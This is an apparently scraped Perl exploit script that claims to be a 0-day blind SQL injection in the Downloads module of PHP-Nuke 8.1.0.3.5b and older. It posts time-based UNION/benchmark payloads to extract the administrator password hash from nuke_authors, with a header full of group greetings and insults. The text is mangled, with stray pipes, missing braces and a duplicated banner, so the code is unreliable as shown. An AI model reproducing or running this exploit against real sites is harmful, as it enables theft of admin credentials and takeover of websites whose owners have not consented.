#!/usr/bin/perl
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection |
# Date: 2010.07.04 after 50 days the bug was discovered. |
# Author/s: Dante90, WaRWolFz Crew |
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, |
# Shades Master, V1R5, yeat |
# Special Greetings To: The:Paradox |
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473 |
# Web Site: www.warwolfz.org |
# My Wagend (Dante90): dante90wwz.altervista.org |
# Why have I decided to publish this? |
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published |
# my own exploit, with their names. |
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE |
my $Victime = shift or &usage; |
my ( $Referer , $Time , $Response ); |
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); |
my $HostName = "http://www.victime_site.org/path/" ; #Insert Victime Web Site Link |
my $Method = HTTP::Request->new(POST => $HostName . 'modules.php?name=Downloads&d_op=Add' ); |
my $Cookies = new HTTP::Cookies; |
my $UserAgent = new LWP::UserAgent( |
default_headers => HTTP::Headers->new, |
my $WaRWolFz = "http://www.warwolfz.org/" ; |
my $DefaultTime = request( $WaRWolFz ); |
sub Blind_SQL_Jnjection { |
my ( $dec , $hex , $Victime ) = @_ ; |
return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}" ; |
for ( my $I =1; $I <=32; $I ++){ #N Hash characters |
for ( my $J =0; $J <=15; $J ++){ #0 -> F |
$Post = Blind_SQL_Jnjection( $I , $chars [ $J ], $Victime ); |
refresh( $HostName , $DefaultTime , $chars [ $J ], $Hash , $Time , $I ); |
refresh( $HostName , $DefaultTime , $chars [ $J ], $Hash , $Time , $I ); |
syswrite (STDOUT, chr ( $chars [ $J ])); |
$Hash .= chr ( $chars [ $J ]); |
refresh( $HostName , $DefaultTime , $chars [ $J ], $Hash , $Time , $I ); |
if ( $I == 1 && length $Hash < 1 && ! $Hash ){ |
print " * Exploit Failed *n" ; |
print " -------------------------------------------------------- n" ; |
print " * Exploit Successfully Executed *n" ; |
print " -------------------------------------------------------- n" ; |
$Start = Time ::HiRes:: time (); |
my $Response = $UserAgent ->post( $HostName . 'modules.php?name=Downloads&d_op=Add' , { |
description => "WaRWolFz Crew" , |
email => "dante90.dmc4@hotmail.it" , |
homepage => "http://www.warwolfz.org/" , |
Referer => $HostName . 'modules.php?name=Downloads&d_op=Add' ); |
$Response ->is_success() or die "$HostName : " , $Response ->message, "n" ; |
$End = Time ::HiRes:: time (); |
print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploitn" ; |
print " -------------------------------------------------------- n" ; |
print " * cd [Local Disk]:\[Directory Of Exploit]\ *n" ; |
print " * perl name_exploit.pl [victime] *n" ; |
print " -------------------------------------------------------- n" ; |
print " * Powered By Dante90, WaRWolFz Crew *n" ; |
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *n" ; |
print " ------------------------------------------------------- n" ; |
print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploitn" ; |
print " -------------------------------------------------------- n" ; |
print " * cd [Local Disk]:\[Directory Of Exploit]\ *n" ; |
print " * perl name_exploit.pl [victime] *n" ; |
print " -------------------------------------------------------- n" ; |
print " * Powered By Dante90, WaRWolFz Crew *n" ; |
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *n" ; |
print " ------------------------------------------------------- n" ; |
print " * Victime Site: " . $_ [0] . "n" ; |
print " * Default Time: " . $_ [1] . " secondsn" ; |
print " * BruteForcing Hash: " . chr ( $_ [2]) . "n" ; |
print " * BruteForcing N Char Hash: " . $_ [5] . "n" ; |
print " * SQL Time: " . $_ [4] . " secondsn" ; |
print " * Hash: " . $_ [3] . "n" ; |
#WaRWolFz Crew
Fonte: http://www.exploit-db.com/exploits/18148/